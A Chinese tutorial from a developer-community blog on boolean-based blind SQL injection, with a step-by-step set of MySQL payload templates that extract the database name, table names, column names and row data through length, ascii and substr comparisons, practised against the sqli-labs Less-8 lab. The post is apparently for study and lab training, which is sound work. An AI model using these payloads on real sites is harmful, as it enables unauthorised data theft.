AI 助理
备案控制台
开发者社区 数据库 文章 正文

布尔盲注

2022-08-23 157
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。

布尔盲注

简介

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。

布尔盲注需要用到的函数

Length()    返回字符串的长度

Substr()    截取字符串

Ascii()      返回字符的ascii码

sleep(n)  将程序挂起一段时间 n为n秒

if(expr1,expr2,expr3)  判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

ascii字符代码表

image-20220713150502362.png

靶场利用

可以利用sqli-labs-master中的less-8

布尔盲注原理

通过页面是否报错来判断语句的正确性,利用函数的特性来得到数据

布尔盲注思路总结

substr(a,b,c) 其中a表示字符串,b表示从第几位开始截取(最小值为1),c表示截取几位

limt 0,1 表示从从第一个数据开始,截取第一个数据

查看是否存在注入点-->


判断注入类型-->


查看页面是否存在输出|是否存在报错提示-->


判断数据库名长度-->and length(database())>数字


得到数据库库名-->and ascii(substr(database(),1,1))=数字


判断表的数量-->and (select count(*) from information_schema.tables where table_schema='库名')>数字


依次判断表名的长度-->and (length((select table_name from information_schema.tables where table_schema='库名' limit 0,1)))>数字


依次得到表名-->and (ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1)))=数字


判断表中字段个数-->and (select count(*) from information_schema.columns where table_name='表名' and table_schema='库名')>数字


依次判断表中字段名的长度-->and (length((select column_name from information_schema.columns where table_name='表名' and table_schema='库名' limit 0,1)))>数字


依次判断表的字段名 --> and ascii(substr((select column_name from information_schema.columns where table_name='表名' and table——schema='库名' limit 0,1),1,1))=数字


依次判断字段中数据的长度-->and (length((select 字段名 from 表名 limit 0,1)))>数字


依次得到字段中的数据-->and ascii(substr((select 字段名 from 表名 limit 0,1 ),1,1)))=x

文章标签:
SQL
数据库
李骨干
目录
相关文章
Hong_zh0
|
9月前
|
SQL 前端开发 Java
SQL注入天书笔记(1)布尔盲注
SQL注入天书笔记(1)布尔盲注
Hong_zh0
100 0
sumith
|
9月前
|
SQL JSON 数据库
常见的sql注入类型闭合及符号
常见的sql注入类型闭合及符号
sumith
262 0
游客mgyx2kmo6h5zo
|
SQL 关系型数据库 MySQL
盲注
在SQL注入过程中,应用界面仅仅返回True(页面)或者False(页面)。无法根据应用程序的返回页面得到需要的数据库信息。可以通过构造逻辑判断(比较大小)来得到需要的信息。
游客mgyx2kmo6h5zo
131 0
coleak
|
XML SQL 安全
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin (xpath盲注)
coleak
214 0
sumith
|
9月前
|
关系型数据库 MySQL 数据库
Mysql注入 -- 布尔注入
Mysql注入 -- 布尔注入
sumith
62 0
华山青竹
|
数据建模 编译器 C语言
布尔表达式
题目链接:http://noi.openjudge.cn/ch0303/6263/ 总时间限制: 1000ms    内存限制: 65536kB 描述 输入一个布尔表达式,请你输出它的真假值。
华山青竹
1247 0
半指温柔乐
|
JavaScript
第12天 :布尔值和关系运算符
一、布尔值 数值型里面的值,有无穷多个,因为世界上所有的数字,都是数值型;字符串型的值,有无穷多个,因为世界上所有的文字、语句都是字符串型;布尔类型的值,就两个,true、false。true 真false 假 var a = true;var b = false;console.log(a); //输出console.log(b); //输出console.log(typeof a); //输出类型console.log(typeof b); //输出类型 布尔值,直接使用就可以了,千万不要加上引号。
半指温柔乐
1181 0
学堂小助手
|
开发者
布尔类型转换|学习笔记
快速学习 布尔类型转换
学堂小助手
126 0
小Lee
|
9月前
|
Python Windows
python语法中错误的运算符或分隔符
【5月更文挑战第19天】python语法中错误的运算符或分隔符
小Lee
87 1
sumith
|
9月前
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
sumith
55 0

热门文章

最新文章

  • 1
    deepseek部署的详细步骤和方法,基于Ollama获取顶级推理能力!
  • 2
    讨论阶段性给予客户交付物所引发的风险问题
  • 3
    Linus Torvalds将中国亮相LinuxCon + ContainerCon + CloudOpen
  • 4
    DispatcherServlet与初始化主线
  • 5
    网络安全研究人员发现新漏洞:或成另一个WannaCry
  • 6
    Swift中常量和变量的声明
  • 7
    [20160516]adrci purge.txt
  • 8
    Docker Secure Deployment Guidelines
  • 9
    Eclipse没有权限操作rt.jar包中的sun包,导致sun.net.ftp.FtpClient引用报错
  • 10
    Learning Cocos2d-x for WP8(9)——Sprite到哪,我做主
  • 1
    去中心化存储:数据存储的新范式
    117
  • 2
    AI 赋能混合云运维:告别手工操作,迈向智能自愈!
    116
  • 3
    从Excel到大数据:别让工具限制你的思维!
    110
  • 4
    Go 切片导致 rand.Shuffle 产生重复数据的原因与解决方案
    97
  • 5
    基于SVPWM矢量控制的无速度传感器电机控制系统simulink建模与仿真
    34
  • 6
    基于小波变换和峰值搜索的光谱检测matlab仿真,带GUI界面
    38
  • 7
    DragAnything:视频PS来了!开源AI控制器让视频「指哪动哪」:拖拽任意物体轨迹,多对象独立运动一键生成
    41
  • 8
    FoloUp:比HR更懂岗位需求!开源语音面试平台爆火:1份岗位需求生成100问,语音AI追问逻辑漏洞
    29
  • 9
    KTransformers:告别天价显卡!国产框架让单卡24G显存跑DeepSeek-R1 671B大模型:推理速度飙升28倍
    329
  • 10
    基于深度学习的路面裂缝检测算法matlab仿真
    24

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    阿里云oss简介和如何对接使用